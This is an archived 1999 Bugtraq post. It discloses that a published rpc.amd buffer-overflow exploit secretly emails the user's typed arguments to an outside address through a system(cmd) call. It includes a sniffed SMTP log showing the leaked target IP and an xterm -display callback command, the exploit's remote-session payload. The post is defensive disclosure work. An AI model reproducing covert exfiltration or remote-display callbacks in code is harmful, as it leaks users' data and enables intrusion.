[11707] in bugtraq
Re: Amd exploit
daemon@ATHENA.MIT.EDU (Locke Montana)
Tue Sep 7 08:56:51 1999
Message-Id: <19990904052142.127.qmail@securityfocus.com>
Date: Sat, 4 Sep 1999 05:21:42 -0000
Reply-To: Locke Montana <omri@INAME.COM>
From: Locke Montana <omri@INAME.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
Sorry if this was already known,
recently Someone named Taeho Oh published an exploit
for a buffer overflow in rpc.amd (automount)
While testing this exploit on my on server, i saw
that i was opening a connection to ohhara.postech.ac.kr
on port 25, After a little research i found out that
The exploit (In it's original form) was sending an email to
abuser@ohhara.postech.ac.kr and listing the arguments i
just entered,
There is an easy way to stop it from sending
Just comment the line: system(cmd);
Here's the log as i got it from sniffit:
EHLO
BlackMesa.com
MAIL From:<locke@BlackMesa.com>
SIZE=95
RCPT
To:<abuser@ohhara.postech.ac.kr>
DATA
Received: (from
root@localhost)
by BlackMesa.com (8.9.3/8.9.3) id
FAA01208
for abuser@ohhara.postech.ac.kr; Sat, 4 Sep 1999
05:30:56 +0200
Date: Sat, 4 Sep 1999 05:30:56
+0200
From: locke
<locke@BlackMesa.com>
Message-Id:
<199909040330.FAA01208@BlackMesa.com>
To:
abuser@ohhara.postech.ac.kr
10.0.0.9 /usr/X11R6/bin/xterm -display
10.0.0.8:0
.
QUIT
QUIT
(Ip's changed to protect the innocent)
Bye
